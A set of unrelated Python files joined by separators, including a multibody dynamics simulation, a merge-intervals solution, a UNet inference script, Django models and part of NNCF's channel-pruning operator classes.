r_dd=r_dd_list[n-1]
p_dd=p_dd_list[n-1]
lagrange=lagrange_list[n-1]
lambda_p=lambda_p_list[n-1]
z_0=np.zeros([7*nb+1*nb+nc,1])
z_0[0:3*nb]=r_dd_list[n-1]
z_0[3*nb:7*nb]=p_dd_list[n-1]
z_0[7*nb:7*nb+nb]=lambda_p_list[n-1]
z_0[7*nb+nb:]=lagrange_list[n-1]
tol=1e-4
error=1
count=1
while abs(error) > tol and count < 30:
if count == 1:
z=z_0
else:
z=z
beta_0=1
alpha1=1
lambda_p=z[14:16]
lagrange=z[16:26]
C_r_n=alpha1*r_list[:,n-1]
C_r_n.shape=(3*nb,1)
C_p_n=alpha1*p_list[:,n-1]
C_p_n.shape=(4*nb,1)
C_r_dot_n=alpha1*r_d_list[:,n-1]
C_r_dot_n.shape=(3*nb,1)
C_p_dot_n=alpha1*p_d_list[:,n-1]
C_p_dot_n.shape=(4*nb,1)
r=C_r_n+(beta_0**2)*(h**2)*z[0:3*nb]
p=C_p_n+(beta_0**2)*(h**2)*z[3*nb:7*nb]
r_d=C_r_dot_n+beta_0*h*z[0:3*nb]
p_d=C_p_dot_n+beta_0*h*z[3*nb:7*nb]
X_n=X
X_n[1].q[0:3]=r[0:3]
X_n[2].q[0:3]=r[3:6]
X_n[1].q[3:]=p[0:4]
X_n[2].q[3:]=p[4:8]
X_n[1].A_rotation=build_A(X_n[1].q[3:])
X_n[2].A_rotation=build_A(X_n[2].q[3:])
X_n[1].r_dot=r_d[0:3]
X_n[2].r_dot=r_d[3:6]
X_n[1].p_dot=p_d[0:4]
X_n[2].p_dot=p_d[4:8]
X_n[1].r_d_dot=z[0:3]
X_n[2].r_d_dot=z[3:6]
X_n[1].p_d_dot=z[6:10]
X_n[2].p_d_dot=z[10:14]
PHI=calc_phi_HW82(X_n,constraint_list,0)
PHI=np.array(PHI)
partials=calc_partials_HW82(X_n,constraint_list)
jacobian=np.vstack(partials)
#jacobian=build_ja(X,partials)
phi_r=jacobian[:,3:9]
phi_p=jacobian[:,13:]
nue_values=calc_nue(X_n,constraint_list,df)
#jacobian=jacobian[:-2,:] #remove euler parameterization constraint
# phi_r=np.zeros([10,6])
# phi_r[:,0:3]=jacobian[:,0:3] #get ri
# phi_r[:,3:6]=jacobian[:,3:6]
#
# phi_p=np.zeros([10,8])
# phi_p[:,0:4]=jacobian[:,6:10]
# phi_p[:,4:8]=jacobian[:,10:14]
#
for i in range(1,len(X)):
PHI_P[i-1]=1/2*(X_n[i].q[3:].T @ X_n[i].q[3:]) - 1/2
G_dot=[]
for i in range(1,len(X)):
G_dot.append(build_G(X_n[i].p_dot))
tau_hat_list=[]
for i in range(0,len(G_dot)):
tau_hat_list.append(8*np.dot(np.dot(np.dot(G_dot[i].T,J_bar[i]),G_dot[i]),X_n[i+1].q[3:]))
G=[]
for i in range(1,len(X)):
G.append(build_G(X_n[i].q[3:]))
J_P_list=[]
for i in range(0,len(G)):
J_P_list.append(4*np.dot(np.dot(np.transpose(G[i]),J_bar[i]),G[i]))
P=np.zeros([2,8])
P[0,0:4]=X[1].q[3:].T
P[1,4:8]=X[2].q[3:].T
g=np.zeros([8*nb+nc,1])
g[0:3*nb]=M @ z[0:3*nb] + phi_r.T @ z[16:26] - F
g[3*nb:3*nb+4*nb] = J_P @ z[3*nb:3*nb+4*nb] + phi_p.T @ z[16:26] + P.T @ z[14:16]- tau_hat
g[3*nb+4*nb:3*nb+4*nb+nb]=1/((beta_0**2)*(h**2))*PHI_P
last_g=(1/((beta_0**2)*(h**2)) * PHI)
last_g.shape=(nc,1)
g[3*nb+4*nb+nb:3*nb+4*nb+nb+nc]=last_g
PSI=np.zeros([8*nb+nc,8*nb+nc])
PSI[0:3*nb,0:3*nb]=M
PSI[0:3*nb,3*nb+4*nb+nb:3*nb+4*nb+nb+nc]=phi_r.T
PSI[3*nb:3*nb+4*nb,3*nb:3*nb+4*nb]=J_P
PSI[3*nb:3*nb+4*nb,3*nb+4*nb:3*nb+4*nb+nb]=P.T
PSI[3*nb:3*nb+4*nb,3*nb+4*nb+nb:3*nb+4*nb+nb+nc]=phi_p.T
PSI[3*nb+4*nb:3*nb+4*nb+nb,3*nb:3*nb+4*nb]=P
PSI[3*nb+4*nb+nb:3*nb+4*nb+nb+nc,0:3*nb]=phi_r
PSI[3*nb+4*nb+nb:3*nb+4*nb+nb+nc,3*nb:3*nb+4*nb]=phi_p
delta_z=-np.dot(np.linalg.inv(PSI),g)
z=z+delta_z
error=np.linalg.norm(delta_z)
count=count+1
if count > 29:
print("did not converge")
nue_values=calc_nue(X_n,constraint_list,df)
nue_list.append(nue_values)
vel=phi_r @ r_d + phi_p @ p_d
# vel_violation.append(np.linalg.norm(vel))
r_list[:,n:n+1]=r
p_list[:,n:n+1]=p
r_d_list[:,n:n+1]=r_d
p_d_list[:,n:n+1]=p_d
r_dd_list.append(z[0:6])
p_dd_list.append(z[6:14])
lambda_p_list.append(z[14:16])
lagrange_list.append(z[16:26])
# G=build_G(p)
# torque=[]
# for kk in range(0,len(constraint_list)):
# torque.append(-1/2*G @ phi_p[kk,:] * z[8+kk])
# torque=-0.5*(G @ phi_p[5] * z[13:14])
# torque=phi_p.T @ z[8:14] + P.T @ z[7:8]
# torque_list.append(torque)
n=n+1
toc=ttime.perf_counter()
elapsed_time=toc-tic
print(elapsed_time)
#%%
xx=r_list[0,:]
yy=r_list[1,:]
zz=r_list[2,:]
fig, axs = plt.subplots(3)
axs[0].set(title="Body 1 point O'")
axs[0].plot(time_list,xx)
axs[0].set(ylabel='x')
axs[1].plot(time_list,yy)
axs[1].set(ylabel='y')
axs[2].plot(time_list,zz)
axs[2].set(ylabel='z')
axs[2].set(xlabel='time')
#%%calculate omega
E_list=[]
for i in range(0,max(p_list.shape)):
E_list.append(build_E(p_list[:4,i]))
omega_list=np.zeros([3,max(p_list.shape)])
for i in range(0,max(p_d_list.shape)):
omega=2*(np.dot(E_list[i], p_d_list[:4,i]))
omega.shape=(3,1)
omega_list[:,i:i+1]=omega
omx=omega_list[0,:]
omy=omega_list[1,:]
omz=omega_list[2,:]
fig, axs = plt.subplots(3)
axs[0].set(title="Body 1 point O'")
axs[0].plot(time_list,omx)
axs[0].set(ylabel='omega x')
axs[1].plot(time_list,omy)
axs[1].set(ylabel='omega y')
axs[2].plot(time_list,omz)
axs[2].set(ylabel='omega z')
axs[2].set(xlabel='time')
#%%
xx2=r_list[3,:]
yy2=r_list[4,:]
zz2=r_list[5,:]
fig, axs = plt.subplots(3)
axs[0].set(title="Body 2 point O'")
axs[0].plot(time_list,xx2)
axs[0].set(ylabel='x')
axs[1].plot(time_list,yy2)
axs[1].set(ylabel='y')
axs[2].plot(time_list,zz2)
axs[2].set(ylabel='z')
axs[2].set(xlabel='time')
#%%calculate omega
E_list=[]
for i in range(0,max(p_list.shape)):
E_list.append(build_E(p_list[4:8,i]))
omega_list=np.zeros([3,max(p_list.shape)])
for i in range(0,max(p_d_list.shape)):
omega=2*(np.dot(E_list[i], p_d_list[4:8,i]))
omega.shape=(3,1)
omega_list[:,i:i+1]=omega
omx=omega_list[0,:]
omy=omega_list[1,:]
omz=omega_list[2,:]
fig, axs = plt.subplots(3)
axs[0].set(title="Body 2 point O'")
axs[0].plot(time_list,omx)
axs[0].set(ylabel='omega x')
axs[1].plot(time_list,omy)
axs[1].set(ylabel='omega y')
axs[2].plot(time_list,omz)
axs[2].set(ylabel='omega z')
axs[2].set(xlabel='time')
#%%
nue_array=np.zeros([len(time_list)-1,10])
violation_list=[0]
for i in range(0,len(nue_list)):
nue_array[i,:]=nue_list[i]
violation_list.append(np.linalg.norm(nue_array[i,:]))
plt.figure()
plt.plot(time_list,violation_list)
plt.ylabel('2-Norm of Velocity Violation')
plt.xlabel('Time')
|
# https://leetcode.com/problems/merge-intervals/
# Definition for an interval.
# class Interval(object):
# def __init__(self, s=0, e=0):
# self.start = s
# self.end = e
# Algorithm
# Two intervals i1 and i2 can be overlapping if and only if
# * i2.start <= i1.end
# If this is the case two intervals can be merged by this process:
# * make start equal to the min of the two interval starts.
# * make the end equal to the max of the two interval ends.
class Solution(object):
def merge(self, intervals):
"""
:type intervals: List[Interval]
:rtype: List[Interval]
"""
def is_overlapping(source, target):
# hard overlap
return target.start <= source.end
def merge_two(i1, i2):
# new start becomes the smallest of the two intervals' start
start = i1.start if i1.start <= i2.start else i2.start
# new end becomes the largest of the two ends
end = i1.end if i1.end >= i2.end else i2.end
return Interval(start, end)
if len(intervals) == 0: return []
output = []
# sort intervals by start.
intervals = sorted(intervals, key=lambda e: e.start)
current = intervals[0]
for interval in intervals[1:]:
if is_overlapping(current, interval):
current = merge_two(current, interval)
else:
output.append(current)
current = interval
output.append(current)
return output
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
from scrapy.loader.processors import MapCompose
class ArticlespiderItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
def add_prefix(value):
return value + 'YZK_SPIDER'
class JobboleArticleItem(scrapy.Item):
title = scrapy.Field(
input_processor=MapCompose(add_prefix)
)
create_date = scrapy.Field()
url = scrapy.Field()
url_object_id = scrapy.Field()
praise_num = scrapy.Field()
favor_num = scrapy.Field()
comment_num = scrapy.Field()
tags = scrapy.Field()
|
from datetime import date, timedelta
from desio.model import users, fixture_helpers as fh
from desio.tests import *
class TestMiddleware(TestController):
form_url = url_for(controller='test', action='rando_form')
exception_url = url_for(controller='test', action='exception')
def test_timer_proxy(self):
u = fh.create_user()
self.flush()
self.login(u)
response = self.post(self.form_url, {
'a_number': 32,
'a_string': 'aodij'
})
assert response.tmpl_context.show_debug == False
assert response.tmpl_context.queries == ''
u = fh.create_user(is_admin=True)
self.flush()
self.login(u)
response = self.post(self.form_url, {
'a_number': 32,
'a_string': 'aodij'
})
assert response.tmpl_context.show_debug == True
assert len(response.tmpl_context.queries) == 3
assert response.tmpl_context.querie_time > 0.0
for q, t in response.tmpl_context.queries:
assert q
assert t > 0.0
"""
def test_error_middleware(self):
u = fh.create_user()
self.flush()
self.login(u)
response = self.client_async(self.exception_url, {
'type': 'app'
})
assert 'debug' not in response
u = fh.create_user(is_admin=True)
self.flush()
self.login(u)
response = self.client_async(self.exception_url, {
'type': 'app'
})
assert 'debug' in response
assert response.debug
assert response.debug.file
assert response.debug.line
assert response.debug.trace
assert response.debug.url
assert response.debug.message
""" |
import numpy as np
from PIL import Image
import torch
import torch.nn as nn
from torch.autograd import Variable
# from import *
import torch.nn as nn
# from accuracy import accuracy_check, accuracy_check_for_batch
import scipy.io as sio
import os
from loss import *
from unet1 import *
import matplotlib.pyplot as plt
START_FILTER = 32
IMG_CHANNELS = 1
IMG_HEIGHT= 512
IMG_WIDTH = 512
WEIGHTS_PATH = './weights/weights_train6_2-1000epochs.pth'
TEST_PATH = './Test_data/'
SAVE_PATH = './Results/' + (WEIGHTS_PATH.split('_')[1].split('.')[0] + '_final')
lst = os.listdir(TEST_PATH)
n_samples = len(lst)//2
if not os.path.exists(SAVE_PATH):
os.mkdir(SAVE_PATH)
print('\nFolder Created', SAVE_PATH)
else:
print('\nAlready exists', SAVE_PATH)
# Load Model
device = torch.device('cpu')
model = UNet(START_FILTER)
model.load_state_dict(torch.load(WEIGHTS_PATH, map_location=device))
model = torch.nn.DataParallel(model, device_ids=list(
range(torch.cuda.device_count()))).cuda()
model.eval()
X_test = np.zeros((n_samples, IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype='float32')
Y_test = np.zeros((n_samples, IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype='float32')
full = 'original'
limited = 'limited_noise_interpolated'
files = os.listdir(TEST_PATH)
for file in files:
if (file.startswith('original')):
continue
load_path = TEST_PATH + file
# Load image and add reflective padding
print(file)
mat = sio.loadmat(load_path)
test_img = np.asarray(mat[limited], dtype='float32')
test_img = np.pad(test_img, [(156,156),(0,0) ], mode = 'reflect')
# test_img = np.pad(test_img, [(156,156),(0,0) ], mode = 'constant', constant_values=0)
plt.imsave('in.png', test_img, cmap='Greys')
test_img = test_img.reshape(1, IMG_HEIGHT, IMG_WIDTH)
# print('test_img np: ',test_img)
test_img = torch.FloatTensor(test_img)
# print('test_tensor',test_img.shape)
print('\n')
with torch.no_grad():
# print('test image: ',test_img)
model_out = Variable(test_img.unsqueeze(0).cuda())
# print('model_out: ',model_out)
model_output = model(model_out)
# print('model_out: ',model_output)
pred_out = np.asarray(model_output.cpu().detach().numpy(), dtype = 'float32').reshape(512, 512)
plt.imsave('pred.png', pred_out, cmap='Greys')
pred_out = pred_out[156:356, :]
save_name = file.split('.')[0] + '_pred.mat'
sio.savemat(SAVE_PATH + '/' + save_name, {"pred_pad": pred_out})
print('Saving mat file...', save_name)
|
#!/usr/bin/env python
# encoding: UTF-8
from xml.etree import ElementTree as ET
import os
class XmlHandler:
def __init__(self, xmlfile):
print ("xmlHandler init: " + xmlfile)
self.xmlTree = self.readXml(xmlfile)
def readXml(self, in_path):
if not os.path.exists(in_path):
print ("there is no such file: " + in_path)
sys.exit()
try:
tree = ET.parse(in_path)
except:
print ("tree parse error")
print ("return tree successfully")
return tree
def getNodes(self, tree):
root = tree.getroot()
print ("return root successfully")
return root.getchildren()
def findNode(self, nodes, tag):
for node in nodes:
if node.tag == tag:
return node
def getTexts(self, nodes, tags):
texts = []
for tag in tags:
texts.append(self.findNode(nodes, tag).text)
return texts
def read(self):
nodes = self.getNodes(self.xmlTree)
host, port, path, timestamp, offset= self.getTexts(nodes, ["host", "port", "path", "timestamp", "offset"])
return host, port, path, timestamp, offset
def writeXml(self, node, text):
node.text = text
#print node.tag, node.text
def setTexts(self, texts, tags):
nodes = self.getNodes(self.xmlTree)
for text, tag in zip(texts, tags):
self.writeXml(self.findNode(nodes, tag), text)
def write(self, newTimestamp, newOffset, xmlfile):
#int "time is " + newTimestamp
self.setTexts([newTimestamp, newOffset], ["timestamp", "offset"])
self.xmlTree.write(xmlfile, encoding="utf-8")
if __name__ == '__main__':
xmlHandler = XmlHandler("client_config.xml")
print xmlHandler.read()
#xmlHandler.write("newTimestamp", "newOffset", "client_config.xml")
print xmlHandler.read()
|
from django.db import models
from django.contrib.auth.models import User
# модель для создания ДЗ для пользователей
class Homework(models.Model):
homework_name = models.CharField(max_length=100)
description = models.CharField(max_length=300)
def __str__(self):
return self.homework_name
# модель для связывания пользователя, заданного ДЗ и его ответа
class PersonalHomework(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
homework_task = models.ForeignKey(Homework, on_delete=models.CASCADE)
homework_file = models.FieldFile()
def __str__(self):
data = (self.user.username, self.homework_task.homework_name)
return ' | '.join(data)
# модель для результатирующих данных о всех ДЗ
class HomeworkResult(models.Model):
HM = models.ForeignKey(PersonalHomework, on_delete=models.CASCADE)
mark = models.IntegerField(default=0)
explanation = models.CharField(max_length=100)
condition = models.CharField(max_length=20, choices=[('done', 'Done'),('fail', 'Fail')])
def __str__(self):
data = (self.HM.user.username, self.HM.homework_task.homework_name)
return ' | '.join(data) |
import numpy as np
n1=np.random.randint(10,50,10)
print(n1)
print(np.std(n1))
print(np.mean(n1))
print(np.median(n1))
|
"""
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import networkx as nx
import torch
from nncf.common.pruning.export_helpers import DefaultMetaOp
from nncf.common.pruning.utils import is_grouped_conv
from nncf.common.pruning.utils import get_sources_of_node
from nncf.common.graph.module_attributes import GroupNormModuleAttributes
from nncf.dynamic_graph.graph import PTNNCFGraph
from nncf.dynamic_graph.graph import PTNNCFNode
from nncf.dynamic_graph.operator_metatypes import NoopMetatype, HardTanhMetatype, TanhMetatype, RELUMetatype, \
PRELUMetatype, ELUMetatype, GELUMetatype, SigmoidMetatype, SoftmaxMetatype, AvgPool2dMetatype, MaxPool2dMetatype, \
DropoutMetatype, Conv1dMetatype, Conv2dMetatype, Conv3dMetatype, BatchNormMetatype, CatMetatype, AddMetatype, \
SubMetatype, DivMetatype, MulMetatype, LinearMetatype, MatMulMetatype, MinMetatype, MaxMetatype, MeanMetatype, \
ConvTranspose2dMetatype, ConvTranspose3dMetatype, GroupNormMetatype
from nncf.common.utils.logger import logger as nncf_logger
from nncf.nncf_network import NNCFNetwork
from nncf.pruning.export_utils import PTPruningOperationsMetatypeRegistry
from nncf.pruning.export_utils import identity_mask_propagation, get_input_masks, \
fill_input_masks
from nncf.layers import NNCF_WRAPPED_USER_MODULES_DICT
from nncf.pruning.utils import is_depthwise_conv
PT_PRUNING_OPERATOR_METATYPES = PTPruningOperationsMetatypeRegistry("operator_metatypes")
# pylint: disable=protected-access
class PTDefaultMetaOp(DefaultMetaOp):
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node: dict, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
"""
Propagate mask through a node using masks of all inputs and pruning mask of current node (if any).
Should set the following attributes:
input_masks - list of masks of input nodes (None if there is no mask in some input)
output_mask - resulting mask of nx_node operation
:param model: model to prune
:param nx_node: node from networkx graph to propagate mask through it
:param graph: graph of model to prune
:param nx_graph: networkx graph
"""
raise NotImplementedError
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node: dict, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
"""
Prune nx_node by input_masks (if masks is not none and operation support it).
"""
@classmethod
def output_prune(cls, model: NNCFNetwork, nx_node: dict, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
"""
Prune nx_node by output_mask (if mask is not none and operation support it).
"""
@PT_PRUNING_OPERATOR_METATYPES.register('model_input')
class PTInput(PTDefaultMetaOp):
subtypes = [NoopMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
return False
@classmethod
def mask_propagation(cls, model, nx_node, graph, nx_graph):
nx_node['input_masks'] = []
nx_node['output_mask'] = None
@PT_PRUNING_OPERATOR_METATYPES.register('identity_mask_propagation')
class PTIdentityMaskForwardOps(PTDefaultMetaOp):
subtypes = [HardTanhMetatype, TanhMetatype, RELUMetatype, PRELUMetatype, ELUMetatype, GELUMetatype, SigmoidMetatype,
SoftmaxMetatype, AvgPool2dMetatype, MaxPool2dMetatype, DropoutMetatype]
additional_types = ['h_sigmoid', 'h_swish', 'RELU']
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
return True
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
identity_mask_propagation(nx_node, nx_graph)
@PT_PRUNING_OPERATOR_METATYPES.register('convolution')
class PTConvolution(PTDefaultMetaOp):
subtypes = [Conv1dMetatype, Conv2dMetatype, Conv3dMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
accept_pruned_input = True
if is_grouped_conv(node):
if not is_depthwise_conv(node):
accept_pruned_input = False
return accept_pruned_input
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
output_mask = None
is_depthwise = False
input_masks = get_input_masks(nx_node, nx_graph)
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
if node_module.pre_ops:
output_mask = node_module.pre_ops['0'].op.binary_filter_pruning_mask
# In case of group convs we can't prune by output filters
if is_grouped_conv(nncf_node):
if is_depthwise_conv(nncf_node):
# Depthwise case
is_depthwise = True
output_mask = input_masks[0]
else:
output_mask = None
nx_node['input_masks'] = input_masks
nx_node['output_mask'] = output_mask
nx_node['is_depthwise'] = is_depthwise
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
input_mask = nx_node['input_masks'][0]
if input_mask is None:
return
bool_mask = torch.tensor(input_mask, dtype=torch.bool)
new_num_channels = int(torch.sum(input_mask))
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
is_depthwise = nx_node['is_depthwise']
old_num_clannels = int(node_module.weight.size(1))
if is_depthwise:
# In depthwise case prune output channels by input mask, here only fix for new number of input channels
node_module.groups = new_num_channels
node_module.in_channels = new_num_channels
old_num_clannels = int(node_module.weight.size(0))
else:
out_channels = node_module.weight.size(0)
broadcasted_mask = bool_mask.repeat(out_channels).view(out_channels, bool_mask.size(0))
new_weight_shape = list(node_module.weight.shape)
new_weight_shape[1] = new_num_channels
node_module.in_channels = new_num_channels
node_module.weight = torch.nn.Parameter(node_module.weight[broadcasted_mask].view(new_weight_shape))
nncf_logger.info('Pruned Convolution {} by input mask. Old input filters number: {}, new filters number:'
' {}.'.format(nx_node['key'], old_num_clannels, new_num_channels))
@classmethod
def output_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
mask = nx_node['output_mask']
if mask is None:
return
bool_mask = torch.tensor(mask, dtype=torch.bool)
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
old_num_clannels = int(node_module.weight.size(0))
node_module.out_channels = int(torch.sum(mask))
node_module.weight = torch.nn.Parameter(node_module.weight[bool_mask])
if node_module.bias is not None:
node_module.bias = torch.nn.Parameter(node_module.bias[bool_mask])
nncf_logger.info('Pruned Convolution {} by pruning mask. Old output filters number: {}, new filters number:'
' {}.'.format(nx_node['key'], old_num_clannels, node_module.out_channels))
@PT_PRUNING_OPERATOR_METATYPES.register('transpose_convolution')
class PTTransposeConvolution(PTDefaultMetaOp):
subtypes = [ConvTranspose2dMetatype, ConvTranspose3dMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
return True
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
output_mask = None
accept_pruned_input = True
input_masks = get_input_masks(nx_node, nx_graph)
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
if node_module.pre_ops:
output_mask = node_module.pre_ops['0'].op.binary_filter_pruning_mask
nx_node['input_masks'] = input_masks
nx_node['output_mask'] = output_mask
nx_node['accept_pruned_input'] = accept_pruned_input
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
input_mask = nx_node['input_masks'][0]
if input_mask is None:
return
bool_mask = torch.tensor(input_mask, dtype=torch.bool)
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
old_num_clannels = int(node_module.weight.size(0))
node_module.in_channels = int(torch.sum(bool_mask))
node_module.weight = torch.nn.Parameter(node_module.weight[bool_mask])
nncf_logger.info('Pruned ConvTranspose {} by input mask. Old input filters number: {}, new filters number:'
' {}.'.format(nx_node['key'], old_num_clannels, node_module.in_channels))
@classmethod
def output_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
output_mask = nx_node['output_mask']
if output_mask is None:
return
bool_mask = torch.tensor(output_mask, dtype=torch.bool)
new_num_channels = int(torch.sum(bool_mask))
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
old_num_clannels = int(node_module.weight.size(1))
in_channels = node_module.weight.size(0)
broadcasted_mask = bool_mask.repeat(in_channels).view(in_channels, bool_mask.size(0))
new_weight_shape = list(node_module.weight.shape)
new_weight_shape[1] = new_num_channels
node_module.out_channels = new_num_channels
node_module.weight = torch.nn.Parameter(node_module.weight[broadcasted_mask].view(new_weight_shape))
if node_module.bias is not None:
node_module.bias = torch.nn.Parameter(node_module.bias[bool_mask])
nncf_logger.info('Pruned ConvTranspose {} by pruning mask. Old output filters number: {}, new filters number:'
' {}.'.format(nx_node['key'], old_num_clannels, node_module.out_channels))
@PT_PRUNING_OPERATOR_METATYPES.register('batch_norm')
class PTBatchNorm(PTDefaultMetaOp):
subtypes = [BatchNormMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
return True
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
identity_mask_propagation(nx_node, nx_graph)
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
input_mask = nx_node['input_masks'][0]
if input_mask is None:
return
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
bool_mask = torch.tensor(input_mask, dtype=torch.bool)
old_num_clannels = int(node_module.weight.size(0))
new_num_channels = int(torch.sum(input_mask))
node_module.num_features = new_num_channels
node_module.weight = torch.nn.Parameter(node_module.weight[bool_mask])
node_module.bias = torch.nn.Parameter(node_module.bias[bool_mask])
node_module.running_mean = torch.nn.Parameter(node_module.running_mean[bool_mask], requires_grad=False)
node_module.running_var = torch.nn.Parameter(node_module.running_var[bool_mask], requires_grad=False)
nncf_logger.info('Pruned BatchNorm {} by input mask. Old num features: {}, new num features:'
' {}.'.format(nx_node['key'], old_num_clannels, new_num_channels))
@PT_PRUNING_OPERATOR_METATYPES.register('group_norm')
class GroupNorm(PTDefaultMetaOp):
subtypes = [GroupNormMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
# For Instance Normalization
return isinstance(node.module_attributes, GroupNormModuleAttributes) \
and node.module_attributes.num_groups == node.module_attributes.num_channels
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
identity_mask_propagation(nx_node, nx_graph)
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
input_mask = nx_node['input_masks'][0]
if input_mask is None:
return
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
bool_mask = torch.tensor(input_mask, dtype=torch.bool)
old_num_clannels = int(node_module.weight.size(0))
new_num_channels = int(torch.sum(input_mask))
node_module.num_channels = new_num_channels
node_module.num_groups = new_num_channels
node_module.weight = torch.nn.Parameter(node_module.weight[bool_mask])
node_module.bias = torch.nn.Parameter(node_module.bias[bool_mask])
nncf_logger.info('Pruned GroupNorm {} by input mask. Old num features: {}, new num features:'
' {}.'.format(nx_node['key'], old_num_clannels, new_num_channels))
@PT_PRUNING_OPERATOR_METATYPES.register('concat')
class PTConcat(PTDefaultMetaOp):
subtypes = [CatMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
return True
@classmethod
def all_inputs_from_convs(cls, nx_node, nx_graph, graph):
"""
Return whether all input sources of nx_node is convolutions or not
:param nx_node: node to determine it's sources
:param nx_graph: networkx graph to work with
:param graph: NNCF graph to work with
"""
inputs = [u for u, _ in nx_graph.in_edges(nx_node['key'])]
input_masks = get_input_masks(nx_node, nx_graph)
for i, inp in enumerate(inputs):
# If input has mask -> it went from convolution (source of this node is a convolution)
if input_masks[i] is not None:
continue
nncf_input_node = graph._nx_node_to_nncf_node(nx_graph.nodes[inp])
source_nodes = get_sources_of_node(nncf_input_node, graph, PTConvolution.get_all_op_aliases() +
PTStopMaskForwardOps.get_all_op_aliases() +
PTInput.get_all_op_aliases())
sources_types = [node.op_exec_context.operator_name for node in source_nodes]
if any(t in sources_types for t in PTStopMaskForwardOps.get_all_op_aliases()):
return False
return True
@classmethod
def check_concat(cls, nx_node, nx_graph, graph):
if cls.all_inputs_from_convs(nx_node, nx_graph, graph):
return True
return False
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
result_mask = None
if cls.check_concat(nx_node, nx_graph, graph):
input_masks, filled_input_masks = fill_input_masks(nx_node, nx_graph)
if all(mask is None for mask in input_masks):
result_mask = None
else:
result_mask = torch.cat(filled_input_masks)
nx_node['input_masks'] = input_masks
nx_node['output_mask'] = result_mask
@PT_PRUNING_OPERATOR_METATYPES.register('elementwise')
class PTElementwise(PTDefaultMetaOp):
subtypes = [AddMetatype, SubMetatype, DivMetatype, MulMetatype]
@classmethod
def accept_pruned_input(cls, node: PTNNCFNode):
return True
@classmethod
def mask_propagation(cls, model: NNCFNetwork, nx_node, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
input_masks = get_input_masks(nx_node, nx_graph)
nx_node['input_masks'] = input_masks
if input_masks[0] is not None:
assert all(torch.allclose(input_masks[0], mask) for mask in input_masks)
nx_node['output_mask'] = input_masks[0]
@classmethod
def input_prune(cls, model: NNCFNetwork, nx_node: dict, graph: PTNNCFGraph, nx_graph: nx.DiGraph):
input_mask = nx_node['input_masks'][0]
if input_mask is None:
return
bool_mask = torch.tensor(input_mask, dtype=torch.bool)
nncf_node = graph._nx_node_to_nncf_node(nx_node)
node_module = model.get_module_by_scope(nncf_node.op_exec_context.scope_in_model)
if isinstance(node_module, tuple(NNCF_WRAPPED_USER_MODULES_DICT)):
assert node_module.target_weight_dim_for_compression == 0,\
"Implemented only for target_weight_dim_for_compression == 0"
old_num_clannels = int(node_module.weight.size(0))
new_num_channels = int(torch.sum(input_mask))
node_module.weight = torch.nn.Parameter(node_module.weight[bool_mask])
node_module.n_channels = new_num_channels
